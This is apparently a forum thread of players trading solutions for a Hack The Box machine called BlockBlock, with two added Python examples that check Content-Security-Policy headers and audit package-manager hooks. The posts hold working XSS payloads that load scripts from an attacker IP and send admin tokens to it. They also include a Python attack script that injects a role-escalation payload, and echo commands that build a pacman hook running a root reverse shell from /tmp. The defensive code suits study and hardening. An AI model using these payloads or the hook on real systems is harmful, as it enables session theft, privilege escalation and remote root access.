BLOCKBLOCK - HTB
by osamy7593 - Saturday November 16, 2024 at 07:12 PM
#41
(Nov 18, 2024, 06:32 PM)TxX Wrote:
(Nov 18, 2024, 05:38 PM)a44857437 Wrote:
(Nov 18, 2024, 05:30 PM)TxX Wrote:
(Nov 18, 2024, 05:03 PM)a44857437 Wrote:
(Nov 18, 2024, 04:03 AM)xianling88 Wrote: still no clue how to do this from step 1 and why is that cause my lack of knowledge and skill at blockchain and smart contract.

Just wondering how you authenticate, because I am getting that "Proxy couldn't verify token" error when trying to get the logs

            let balance = await fetch(window.origin + "/api/json-rpc", {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    "token": jwtSecret['Authorization'],
                },
                body: JSON.stringify({
                    jsonrpc: "2.0",
                    method: "eth_getBalance",
                    params: [chatAddress, "latest"],
                    id: 1
                })
            });

thanks, is that the jwtSecret you get from /api/json-rpc as admin, right?

Yes, but no idea what to do with the Authorization token, I have never used blockchain before.

You should be able to call the blockchain rpc's like eth_getLogs etc. This should give you a contract number that you can use in eth_call
but I cannot get it to work yet

I have sent you a PM with some more info
Reply
#42
(Nov 18, 2024, 01:01 PM)a44857437 Wrote:
(Nov 18, 2024, 11:31 AM)olkn00b Wrote:
(Nov 18, 2024, 11:00 AM)xianling88 Wrote:
(Nov 18, 2024, 08:21 AM)Shoseathe Wrote:
(Nov 18, 2024, 07:55 AM)olkn00b Wrote: were you able to get this to work with an external script? or directly with xss by wrapping it in the correct tags? (img)

I used an external script for it. The request for the external script was pretty reliable but getting the admin token back needed multiple tries, like 10 or 20

<img src=x onerror="var script = document.createElement('script'); script.src = 'http://10.10.16.10/exploit.js'; document.body.appendChild(script);" />

I used this to trigger the content of yours, but didn't get admin token, where is wrong???

try this one, and spam it.

<img src=\"1\" onerror=\"this.remove(); var s=document.createElement('script'); s.src='http://10.10.xx.xx/script.js'; document.body.appendChild(s);\">

I used a similar script, but for the username when you report user in the chat window, worked in one go for me, and you need to look carefully at the data you get back...

I used these payloads and injected in the username as well as the report user parameter but I never get a call back on my python server. Anyone could share the steps they followed?
Reply
#43
(Nov 18, 2024, 05:03 PM)a44857437 Wrote:
(Nov 18, 2024, 04:03 AM)xianling88 Wrote: still no clue how to do this from step 1 and why is that cause my lack of knowledge and skill at blockchain and smart contract.

Just wondering how you authenticate, because I am getting that "Proxy couldn't verify token" error when trying to get the logs

Just follow the step hints from this thread and you'll be fine, using the below in a js file, and do the img onerror trick to extract the admin token, use that to authenticate. But you need to try a lot of times manually for this to work, as this is a buggy box, not that good, the blockchain idea is cool tho.
fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://Your Kali IP/log?' + btoa(text), {
        mode: 'no-cors'
    });
});
Reply
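Added example, not from the thread: the chain in posts #42 and #43 has three steps (an inline onerror handler, a script loaded from another host, and a fetch that sends the /api/info response to another host), and each is governed by a different Content-Security-Policy directive. The Python check below reports which steps a given policy would still let through; the function names and sample policies are constructed, and matching of individual hashes or nonces is out of scope.

```python
# Added example: simplified CSP check, not a full CSP3 implementation.
HASH_OR_NONCE = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")

def parse_csp(header):
    """Return {directive: [sources]}; the first copy of a directive wins."""
    policy = {}
    for part in header.split(";"):
        tokens = part.lower().split()
        if tokens:
            policy.setdefault(tokens[0], tokens[1:])
    return policy

def effective(policy, *fallback_chain):
    """Source list of the first directive present, or None if unrestricted."""
    for name in fallback_chain:
        if name in policy:
            return policy[name]
    return None

def any_origin(sources):
    """True if a host the site does not control could match the list."""
    return sources is None or any(s in ("*", "http:", "https:") for s in sources)

def assess(header):
    """For each step of the chain, report whether the policy lets it run."""
    p = parse_csp(header)
    attr = effective(p, "script-src-attr", "script-src", "default-src")
    elem = effective(p, "script-src-elem", "script-src", "default-src")
    conn = effective(p, "connect-src", "default-src")
    # 'unsafe-inline' is ignored once a nonce, hash or 'strict-dynamic' is listed.
    inline = attr is None or ("'unsafe-inline'" in attr
        and "'strict-dynamic'" not in attr
        and not any(s.startswith(HASH_OR_NONCE) for s in attr))
    # With 'strict-dynamic', script elements created from script load from anywhere.
    script = any_origin(elem) or "'strict-dynamic'" in elem
    return {"inline_handler": inline, "foreign_script": script,
            "foreign_fetch": any_origin(conn)}

# Constructed policies, weakest to strictest.
SAMPLES = ["", "script-src 'self' 'unsafe-inline'; connect-src *", "default-src 'self'"]

if __name__ == "__main__":
    for csp in SAMPLES:
        print(repr(csp), assess(csp))
```

A policy only counts as covering the chain when all three values are False; blocking the inline handler alone already stops the first step.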
#44
Can someone please explain how we can avoid getting this error message?

{"error":"Proxy Couldn't verify token"}

I'm trying to use the token from /api/json-rpc to run the eth_getLogs method

Reply
#45
(Nov 19, 2024, 01:29 AM)fl00d777 Wrote: Can someone please explain how we can avoid getting this error message?

{"error":"Proxy Couldn't verify token"}

I'm trying to use the token from /api/json-rpc to run the eth_getLogs method

    def do_lol(self, line):
        """
        Exploits a target by injecting a malicious payload and collecting admin information.
        This function performs the following steps:
        1. Logs in to the application with provided credentials.
        2. Injects a malicious payload to elevate the role of a user to 'admin.'
        3. Executes a secondary payload to exfiltrate admin tokens by abusing '/api/info.'
        4. Prepares for further exploitation using '/admin' and '/api/json-rpc'.
        Parameters:
        line (str): Additional parameters for the target.
        Returns:
        None
        """
        rhost = self.params["rhost"]
        url = f'http://{rhost}'
        lhost = self.params["lhost"]

        payload = (
            "<img src=x onerror=\"fetch('/api/update_role', {method: 'POST', headers: { 'Content-Type': 'application/json'}, "
            "body: JSON.stringify({ 'username': 'grisun0', 'role': 'grisun0'})})\" />"
        )
        headers = {
            "Content-Type": "application/json"
        }
        s = requests.Session()
        print_msg(f"Logging in and sending payload to {url}")
        login_response = s.post(f'{url}/api/login', headers=headers, json={"username": "grisun0", "password": "grisun0"})
        if login_response.status_code == 200:
            print_msg("Login successful. Injecting primary payload.")
            s.cookies.set("role", "admin", domain="blockblock.htb", path="/")
            s.cookies.set(
                "token",
                "eyJhbGciOi..............PJK18ySGlcZ_16dt9-UnKeX2fnM",
                domain="blockblock.htb",
                path="/",
            )
            s.cookies.set("username", "admin", domain="blockblock.htb", path="/")
            jwt_secret = {"Authorization": "34fd1a8cb0b16.........bf2a5d3b9"}
            chat_address = "0x1234567890abcdef1234567890abcdef12345678"
            url = f"{url}/api/json-rpc"
            headers = {
                "Content-Type": "application/json",
                "token": jwt_secret["Authorization"],
            }
            payload = {
                "jsonrpc": "2.0",
                "method": f"{line}",
                "params": ["latest", False],
                "id": 1
            }
            print_msg(payload)
            response = s.post(url, headers=headers, json=payload)
            print_msg(response.json())
     
            return 
Reply
#46
(Nov 19, 2024, 02:06 AM)grisun0 Wrote:
(Nov 19, 2024, 01:29 AM)fl00d777 Wrote: Can someone please explain how we can avoid getting this error message?

{"error":"Proxy Couldn't verify token"}

I'm trying to use the token from /api/json-rpc to run the eth_getLogs method

Any nudge for root ???

Reply
#47
(Nov 19, 2024, 02:06 AM)grisun0 Wrote:
(Nov 19, 2024, 01:29 AM)fl00d777 Wrote: Can someone please explain how we can avoid getting this error message?

{"error":"Proxy Couldn't verify token"}

I'm trying to use the token from /api/json-rpc to run the eth_getLogs method

Thank you so much you rock! ^^

Reply
#48
(Nov 18, 2024, 05:36 PM)0x410x420x41 Wrote: Phew finally rooted, the escalation to root is rather straightforward after you get paul... just create a malicious package with a post-install action and install it

so straightforward 80 people rooted that makes sense

Reply
#49
(Nov 19, 2024, 05:25 AM)hackemall Wrote:
(Nov 18, 2024, 05:36 PM)0x410x420x41 Wrote: Phew finally rooted, the escalation to root is rather straightforward after you get paul... just create a malicious package with a post-install action and install it

so straightforward 80 people rooted that makes sense

how to move on paul i got error ??

Reply
#50
echo "[Trigger]" > /tmp/hooks/revshell.hook

Add Trigger Information:

Run these commands one by one:

echo "Operation = Install" >> /tmp/hooks/revshell.hook
echo "Type = Package" >> /tmp/hooks/revshell.hook
echo "Target = *" >> /tmp/hooks/revshell.hook

Add Action Information:

Run these commands one by one to add the action section:

echo "" >> /tmp/hooks/revshell.hook
echo "[Action]" >> /tmp/hooks/revshell.hook
echo "Description = Reverse shell as root" >> /tmp/hooks/revshell.hook
echo "When = PostTransaction" >> /tmp/hooks/revshell.hook
echo "Exec = /tmp/root_revshell.sh" >> /tmp/hooks/revshell.hook

Reply
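Added example, not from the thread: the file built line by line in post #50 is an ordinary alpm hook, so a host can be audited for hooks like it. The Python audit below flags hook files that live in, or execute a program from, a world-writable directory, and files that are not root-owned; the directory prefixes, function names and SAMPLE text are constructed for illustration.

```python
import os
import stat

WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

def parse_hook(text):
    """Return {(section, key): [values]}; alpm hooks allow repeated keys."""
    fields, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line and section and not line.startswith("#"):
            key, value = (part.strip() for part in line.split("=", 1))
            fields.setdefault((section, key), []).append(value)
    return fields

def audit_hook(text, path):
    """Findings for one hook, given its contents and where the file lives."""
    fields = parse_hook(text)
    findings = []
    if path.startswith(WORLD_WRITABLE):
        findings.append("hook file lives in a world-writable directory")
    for command in fields.get(("Action", "Exec"), []):
        argv = command.split()
        if argv and argv[0].startswith(WORLD_WRITABLE):
            findings.append(f"Exec target {argv[0]} is in a world-writable directory")
    if ("*" in fields.get(("Trigger", "Target"), [])
            and "Install" in fields.get(("Trigger", "Operation"), [])):
        findings.append("fires on every package install (Target = *)")
    return findings

def audit_dir(hook_dir):
    """Map every *.hook file in hook_dir to its findings, ownership included."""
    report = {}
    for name in sorted(n for n in os.listdir(hook_dir) if n.endswith(".hook")):
        path = os.path.join(hook_dir, name)
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings = audit_hook(fh.read(), path)
        st = os.stat(path)
        if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append("file is not root-owned or is group/world-writable")
        report[path] = findings
    return report

# Constructed sample: the hook text that the echo commands in post #50 produce.
SAMPLE = ("[Trigger]\nOperation = Install\nType = Package\nTarget = *\n\n"
          "[Action]\nDescription = Reverse shell as root\n"
          "When = PostTransaction\nExec = /tmp/root_revshell.sh\n")
```

Run audit_dir over each hook directory the package manager is configured to read; any hook with a non-empty findings list deserves a manual look.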

